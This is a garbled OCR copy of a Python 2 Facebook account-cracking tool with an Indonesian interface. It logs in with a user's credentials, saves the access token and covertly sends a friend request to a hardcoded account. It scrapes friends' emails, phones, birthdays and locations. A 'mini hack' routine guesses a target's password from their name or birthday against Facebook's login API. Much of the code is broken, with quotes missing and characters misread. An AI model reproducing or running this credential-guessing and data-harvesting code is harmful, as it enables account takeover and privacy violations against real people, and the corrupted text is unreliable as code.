```
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
  import mechanize
except ImportError:
 os.system(pip2 install mechanize)
else:
  try:
    import requests
  except ImportError:
   os.system(pip2 install requests)
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding(utf8)
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [(User-Agent', Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423
Version/12.16)]
def keluar():
```

```
print \xlb[I;9lm[!] Tutup
os.sys.exit()
def jalan(z):
for e in z + \n:
 sys.stdout.write(e)
 sys.stdout.flush()
 time.sleep(0.01)
\xlb[1;97m●=
  \x|b[1;97m [
                                             ¬\n
\x|b[|;97m|| \x|b[|;93m* \x|b[|;97mReCode \x|b[|;91m: \x|b[|;96m |LANGQWER \x|b[|;97m
                                              ||\n
\x|b[|;97m|| \x|b[|;93m* \x|b[|;97mGitHub \x|b[|;91m: \x|b[|;92m
\xIb[1;97m ┗
.
\n\x|b[|:92m[*] Silahkan Login Operamini Agar Tidak Checkpoint\n
def tik():
titik =[
 for o in titik:
 sys.stdout.flush()
```

## time.sleep(0.01)

```
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = \xIb(3ImNot Vuln
```

```
def login():
 os.system(clear)
  try:
    toket = open(login.txt, r)
    menu()
  except (KeyError, IOError):
    os.system(clear)
    print logo
    print 52 * \xlb[1;97m\xe2\x95\x90
    print \x|b[|;9|m[\xe2\x98\x86]\x|b[|;92mMASUK AKUN FACEBOOK\x|b[|;9|m[\xe2\x98\x86]
    id = raw_{input(\x|b[1;9]m[+] \times lb[1;36mUsername \times lb[1;9]m:\times lb[1;92m')}
    pwd = getpass.getpass(\x|b[|;9|m[+]\x|b[|;36mPassword\x|b[|;9|m:\x|b[|;92m')
    tik()
    try:
     br.open(https://m.facebook.com)
    except mechanize.URLError:
      print \n\xlb[1;91m[!] Tidak Ada Koneksi
      keluar()
    br._factory.is_html = True
    br.select_form(nr=0)
   br.form[email] = id
   br.form['pass'] = pwd
    br.submit()
    url = br.geturl()
```

```
if save-device in url:
      try:
        sig = api_key=882a849036Ida98702bf97a02IddcI4dcredentials_type=passwordemail= + id +
format=JSONgenerate_machine_id=Igenerate_session_cookies=Ilocale=en_USmethod=auth.loginpassword
= + pwd + return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32
data = {api_key: 882a849036Ida98702bf97a02IddcI4d, credentials_type: password, email: id, format: JSON, generate_machine_id: I, generate_session_cookies: I, locale: en_US, method: auth.login, password:pwd, return_ssl_resources: 0, v: I.0}
        x = hashlib.new(md5)
        x.update(sig)
        a = x.hexdigest()
        data.update({ sig: a})
        url = https://api.facebook.com/restserver.php
        r = requests.get(url, params=data)
        z = json.loads(r.text)
        zedd = open(login.txt, w)
        zedd.write(z[access_token])
        zedd.close()
        print \n\x|b[|;9|m[\x|b[|;96m\xe2\x9c\x93\x|b[|;9|m]\x|b[|;92mLogin success
requests.post(https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token= +
z[access_token])
        time.sleep(I)
        menu()
      except requests.exceptions.ConnectionError:
        print \n\xlb[l;9lm[!] Tidak Ada Koneksi
        keluar()
```

```
if checkpoint in url:
      print \\n\xIb[I;9Im[!]\xIb[I;93mA\ccount Has Been Checkpoint
      os.system('rm -rf login.txt')
      time.sleep(0.01)
      keluar()
    else:
      print \\n\x|b[|;9|m[!] Gagal Masuk
      os.system(rm -rf login.txt)
      time.sleep(0.01)
      login()
def menu():
  try:
    toket = open(login.txt, r).read()
  except IOError:
   os.system(clear)
    print \xlb[1;9lm[!] Token not found
    os.system('rm -rf login.txt')
    time.sleep(0.01)
    login()
  else:
    try:
      otw = requests.get(https://graph.facebook.com/me?access_token= + toket)
      a = json.loads(otw.text)
```

```
nama = a[name]
    id = ai'id'
    ots = requests.get(https://graph.facebook.com/me/subscribers?access_token= + toket)
    b = ison.loads(ots.text)
    sub = str(b['summary']['total_count'])
   except KeyError:
    os.system(clear)
    print \xlb[l;9lm[!]\xlb[l;93mSepertinya akun kena Checkpoint
    os.system('rm -rf login.txt')
    time.sleep(0.01)
    login()
   except requests.exceptions.ConnectionError:
    print logo
    print \xlb[l;9lm[!] Tidak Ada Koneksi
    keluar()
 os.system(clear)
 print logo
 print \xIb[I;97m\xe2\x95\x94 + 50 * \xe2\x95\x90 + ¬
 print \\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m +
nama + (39 - len(nama)) * \x|b[1;97m + |
 + (39 - len(id)) * \xIb[I;97m + |
 + (39 - len(sub)) * \xIb[I;97m + |
 print \x|b[|;97m|| + 50 * \xe2\x95\x90 + ']'
 print | -> \x|b[1;37;40ml. User Information |
```

```
print \parallel -> \xIb[1;37;40m2. Hack Facebook Account
  print' \| -> \x|b[1;37;40m3. Bot']
  print \parallel -> \x|b[1;37;40m4. Others
  print | -> \x|b[1;37;40m5. Update
  print | -> \x|b[1;37;40m6. Logout |
  print \parallel -> \x|b[1;31;40m0. Exit
  print \xlb[1;37;40m||'
  pilih()
def pilih():
  zedd = raw_input(' \sqsubseteq \x|b[1;9]m \blacktriangleright \x|b[1;97m')
  if zedd == ":
    print \xlb[l;9lm[!] Can\t empty
    pilih()
  else:
    if zedd == 1:
       informasi()
    else:
      if zedd == 2:
         menu_hack()
       else:
         if zedd == 3:
           menu_bot()
         else:
```

```
if zedd == '4':
  lain()
else:
  if zedd == '5':
    os.system(clear)
    print logo
    print 52 * \xlb[l;97m\xe2\x95\x90
    os.system('git pull origin master')
    raw_input(\n\x|b[|;9|m[\x|b[|;97mBack\x|b[|;9|m])
    menu()
  else:
    if zedd == '6':
      os.system(rm -rf login.txt)
                       os.system(xdg-open https://m.facebook.com/rizz.magizz)
      keluar()
    else:
      if zedd == '0':
        keluar()
      else:
        print \x|b[|:9|m[\xe2\x9c\x96]\x|b[|:97m + zedd + \x|b[|:9|mNot availabel
        pilih()
```

def informasi():

os.system(clear)

```
try:
  toket = open(login.txt, r).read()
except IOError:
  print \xlb[l;9lm[!] Token not found
  os.system(rm -rf login.txt)
  time.sleep(0.01)
  login()
os.system(clear)
print logo
print 52 * \xlb[1;97m\xe2\x95\x90
id = raw_input(\x|b[1;9]m[+]\x|b[1;92m|nput |D\x|b[1;97m/\x|b[1;92m|Name\x|b[1;9]m : \x|b[1;97m])
jalan(\xlb[1;91m[\xe2\x9c\xba]\xlb[1;92mMohon Tunggu\xlb[1;97m...')
r = requests.get(https://graph.facebook.com/me/friends?access_token= + toket)
cok = json.loads(r.text)
for p in cok[ data]:
  if id in p[name] or id in p[id]:
    r = requests.get(https://graph.facebook.com/ + p[id] + '?access_token= + toket)
    z = json.loads(r.text)
    print 52 * \xlb[1;97m\xe2\x95\x90
    try:
      print \x|b[|;9|m[\xe2\x9e\xb9]\x|b[|;92mNama\x|b[|;97m : + z[name]
    except KeyError:
      print \xlb[l;9lm[?]\xlb[l;92mNama\xlb[l;97m :\xlb[l;9lmTidak Ada
    else:
```

```
try:
 print \x|b[|;9|m[\xe2\x9e\xb9]\x|b[|;92m|D\x|b[|;97m : + z[id]
except KeyError:
 print \x|b[|;9|m[?] \x|b[|;92m|D\x|b[|;97m :\x|b[|;9|mTidak Ada
else:
 try:
   print \x|b[|;9|m[\xe2\x9e\xb9]\x|b[|;92mEmail\x|b[|;97m : + z['email']
 except KeyError:
   else:
   try:
    print \x|b[|;9|m[\xe2\x9e\xb9]\x|b[|;92mNomor Telpon\x|b[|;97m : + z[mobile_phone]
   except KeyError:
    print \xlb[l;9lm[?]\xlb[l;92mNomor Telpon\xlb[l;97m:\xlb[l;9lmNot found
   try:
    print \x|b[|;9|m[\xe2\x9e\xb9]\x|b[|;92mLokasi\x|b[|;97m : + z[|location|][|name|]
   except KeyError:
    print \xlb[1;91m[?]\xlb[1;92mLokasi\xlb[1;97m :\xlb[1;91mTidak Ada
 try:
   print \x|b[|;9|m[\xe2\x9e\xb9]\x|b[|;92mLahir\x|b[|;97m : + z[birthday]]
 except KeyError:
```

```
try:
         print \xlb[I;9Im[\xe2\x9e\xb9]\xlb[I;92mSekolah\xlb[I;97m : '
         for q in z[education]:
            try:
             print \x|b[|;9|m ~\x|b[|;97m + q[school ][name]
           except KeyError:
             print \xlb[I;9lm ~\xlb[I;9lmTidak A\da'
       except KeyError:
         pass
     raw\_input(\'\n\xlb[1;9]m[\xlb[1;97mBack\xlb[1;9]m]')
     menu()
  else:
   print \xIb[I;9Im[\xe2\x9c\x96] Pengguna Tidak Ada
   raw_input(\n\times lb[1;9]m[\xlb[1;97mBack\xlb[1;91m]))
   menu()
def menu_hack():
 os.system(clear)
  try:
   toket = open(login.txt, r).read()
  except IOError:
   print \xlb[1;9lm[!] Token not found
```

```
os.system(rm -rf login.txt)
   time.sleep(0.01)
   login()
 os.system(clear)
 print logo
 print 52 * \x|b[|;97m\xe2\x95\x90
 print \parallel -> \x|b[1;37;40ml. Mini Hack Facebook (\x|b[1;92mTarget\x|b[1;97m))
 print | -> \x|b[1;37;40m2. Multi Bruteforce Facebook |
 print | -> \x|b[1;37;40m3. Super Multi Bruteforce Facebook
 print | -> \x|b[|;37;40m4. BruteForce (\x|b[|;92mTarget\x|b[|;97m)
 print | -> \x|b[1;37;40m5. Yahoo Clone
 print | -> \xIb[1;37;40m6. Ambil ID/Email/HP
 print | -> \x|b[1;31;40m0. Back |
 print \xlb[1:37;40m||'
 hack_pilih()
def hack_pilih():
 if hack == ":
   print \xlb[l;9lm[!] Can\ t empty
   hack_pilih()
 else:
   if hack == 1:
```

```
mini()
else:
  if hack == 2:
    crack()
    hasil()
  else:
    if hack == '3':
      super()
    else:
      if hack == '4':
        brute()
      else:
        if hack == '5':
          menu_yahoo()
        else:
          if hack == '6':
            grab()
          else:
            if hack == 0:
              menu()
            else:
              print \x|b[1;9]m[\xe2\x9c\x96] \x|b[1;97m' + hack + 'x|b[1;9]mNot found']
              hack_pilih()
```

```
def mini():
 os.system(clear)
 try:
   toket = open(login.txt, r).read()
 except IOError:
   print \xlb[l;9lm[!] Token not found
   os.system(rm -rf login.txt)
    time.sleep(0.01)
   login()
  else:
   os.system(clear)
   print logo
   print 52 * \xlb[l;97m\xe2\x95\x90
   print \xIb[I;9Im[ INFO ] Target must be your friend!
    try:
      id = raw_input(\x|b[1;9]m[+] \times lb[1;92m|D Target \times lb[1;9]m:\x|b[1;97m])
      jalan(\xlb[1;91m[\xe2\x9c\xba]\xlb[1;92mPlease wait \xlb[1;97m...')
      r = requests.get(https://graph.facebook.com/ + id + '?access_token= + toket)
      a = json.loads(r.text)
      print \x|b[|;9|m[\xe2\x9e\xb9]\x|b[|;92mName\x|b[|;97m: + a[name]
      jalan('\xlb[1;91m[+]\xlb[1;92mChecking\xlb[1;97m...')
      time.sleep(I)
      jalan(\xlb[l;9lm[+]\xlb[l;92mOpen security\xlb[l;97m...')
      time.sleep(I)
      jalan(\xlb[1:91m[\xe2\x9c\xba]\xlb[1:92mPlease wait\xlb[1:97m...)
```

```
print 52 * \xlb[1;97m\xe2\x95\x90
                          pzl = a['first_name'] + 123'
                          data = urllib.urlopen(https://b-
api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739
edla2263bl&format=json&sdk_version=2&email='+id+'&locale=en_US&password='+pzl+
  &sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aaOc44f58f522ef6)
                          y = json.load(data)
                          if access_token in y:
                                  print \xlb[l;9lm[+]\xlb[l;92mFounded.
                                  print \x|b[|;9|m[\x|b[|;96m\xe2\x9c\x93\x|b[|;9|m] \x|b[|;92mName\x|b[|;97m : + a[name]
                                  print x|b[1;9]m[xe2x9exb9] x|b[1;92mUsernamex|b[1;97m: + id]
                                  print \x|b[|;9|m[\xe2\x9e\xb9]\x|b[|;92mPassword\x|b[|;97m: + pz|
                                  raw input(\n\xlb[1;9]m[\xlb[1;97mBack\xlb[1;9]m])
                                  menu_hack()
                          else:
                                  if www.facebook.com in v[error msg]:
                                           print \xlb[l;9lm[+]\xlb[l;92mFounded.
                                           print \xlb[1;91m[!]\xlb[1;93mAccount Maybe Checkpoint
                                          print \xlb[l;9lm[\xlb[l;96m\xe2\x9c\x93\xlb[l;9lm]\xlb[l;92m\Name\xlb[l;97m : + a[name]
                                          print \xlb[I;9Im[\xe2\x9e\xb9]\xlb[I;92mUsername\xlb[I;97m: + id
                                           print \ \left(\frac{1}{9}\right) \times \left(\frac{1}
                                            raw_input(\n\xlb[1;91m[\xlb[1;97mBack\xlb[1;91m])
                                           menu_hack()
                                  else:
                                          pz2 = a[first_name] + 12345
                                            data = urllib.urlopen(https://b-
api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739
```

```
edla2263bl&format=json&sdk_version=2&email= + id + &locale=en_US&password= + pz2 +
&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aaOc44f58f522ef6)
         y = json.load(data)
         if access_token in y:
           print \xlb[l;9lm[+]\xlb[l;92mFounded.
           print \x|b[|;9|m[\x|b[|;96m\xe2\x9c\x93\x|b[|;9|m]\x|b[|;92mName\x|b[|;97m : + a['name']
           print \x|b[|;9|m[\xe2\x9e\xb9]\x|b[|;92mUsername\x|b[|;97m: + id
           print \x|b[|;9|m[\xe2\x9e\xb9]\x|b[|;92mPassword\x|b[|;97m: +pz2
           raw input(\n\x|b[|;9|m[\x|b[|;97mBack\x|b[|;9|m])
           menu_hack()
         else:
           if www.facebook.com in y[error_msg]:
             print \xlb[l;9lm[+]\xlb[l;92mFounded.
             print \xlb[1;9\m[!]\xlb[1;93mAccount Maybe Checkpoint
             print \x|b[|;9|m[\x|b[|;96m\xe2\x9c\x93\x|b[|;9|m]\x|b[|;92mName\x|b[|;97m : + a[name]
             print \x|b[1;9]m[\xe2\xge\xb9] \x|b[1;92mUsername\x|b[1;97m: + id]
             print \xlb[l;9lm[\xe2\x9e\xb9]\xlb[l;92mPassword\xlb[l;97m: +pz2
             raw_input(\n\xlb[1;9]m[\xlb[1;97mBack\xlb[1;9]m])
             menu_hack()
           else:
             pz3 = a[last_name] + 123
             data = urllib.urlopen(https://b-
api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739
edla2263bl&format=json&sdk_version=2&email= + id + &locale=en_US&password= + pz3 +
&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aaOc44f58f522ef6)
             y = json.load(data)
             if access token in v:
```

```
print \xlb[l;9lm[+]\xlb[l;92mFounded.
              print \x|b[|;9|m[\x|b[|;96m\xe2\x9c\x93\x|b[|;9|m] \x|b[|;92mName\x|b[|;97m : + a[name]
              print \xlb[l;9\m[\xe2\x9e\xb9]\xlb[l;92mPassword\xlb[l;97m: +pz3
              raw input(\n\x|b[|;9|m[\x|b[|;97mBack\x|b[|;9|m])
              menu_hack()
            else:
              if www.facebook.com in y[error_msg]:
                print \xlb[1;9lm[+]\xlb[1;92mFounded.
                print \xlb[1;91m[!]\xlb[1;93mAccount Maybe Checkpoint
                print \x|b[|;9|m[\x|b[|;96m\xe2\x9c\x93\x|b[|;9|m] \x|b[|;92mName\x|b[|;97m : + a[name]
                print \xlb[l;91m[\xe2\x9e\xb9]\xlb[l;92mUsername\xlb[l;97m: + id
                print \x|b[|;9|m[\xe2\x9e\xb9]\x|b[|;92mPassword\x|b[|;97m: +pz3
                raw input(\n\xlb[1;91m[\xlb[1;97mBack\xlb[1;91m])
                menu_hack()
              else:
                lahir = a[birthday]
                pz4 = lahir.replace(/, ")
                data = urllib.urlopen(https://b-
api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739
edla2263bl&format=json&sdk_version=2&email='+id+'&locale=en_US&password='+pz4+
```

. &sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aaOc44f58f522ef6)